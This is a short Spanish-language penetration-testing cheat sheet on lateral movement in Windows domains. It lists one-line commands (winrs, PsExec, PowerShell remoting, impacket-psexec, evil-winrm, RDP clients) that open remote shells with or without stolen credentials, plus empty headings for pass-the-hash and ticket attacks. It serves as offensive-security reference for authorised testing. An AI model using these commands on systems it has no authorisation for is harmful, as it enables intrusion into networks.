6. Siguientes pasos
6.1. Tenemos acceso?
winrs
winrs -r:<HOSTNAME> cmdPsExec
.\\PsExec.exe \\\\<HOSTNAME> cmdPS-Script
1- $sess = New-PSSession -ComputerName <HOST>
2- Enter-PSSession -Session $sessScript Block
1- $sess = New-PSSession -ComputerName <HOST>
2- Invoke-Command -Session $Sess -ScriptBlock {ipconfig;whoami;pwd}WSManWinRM
Invoke-WSManWinRM -hostname <HOST> -command cmd6.2. Tenemos credenciales?
winrs -r:<HOST> -u:<Domain>/<USER> -p:<PASS> cmd
.\\PsExec.exe -u <Domain>/<USER> -p <PASS> \\\\<HOSTNAME> cmd
impacket-psexec <<Domain>/<USER>:<PASS>@<IP>>
#WSManWinRM
Invoke-WSManWinRM -hostname <HOST> -command cmd -user <Domain>\\<USER> -password <PASS>
evil-winrm -i <IP> -u <Domain>/<USER>' -p <PASS>
#RDP Access
rdesktop -a 16 <IP> -u <DOMAIN\\USER> -p <PASS>
xfreerdp /v:IP /u:"<USER>" /p:<PASS>6.3. Pass The Hash
6.4. OverPass The Hash (OPTH) O Pass The Key (PTK)
6.5. Pass The Ticket (PTT)
Last updated
Was this helpful?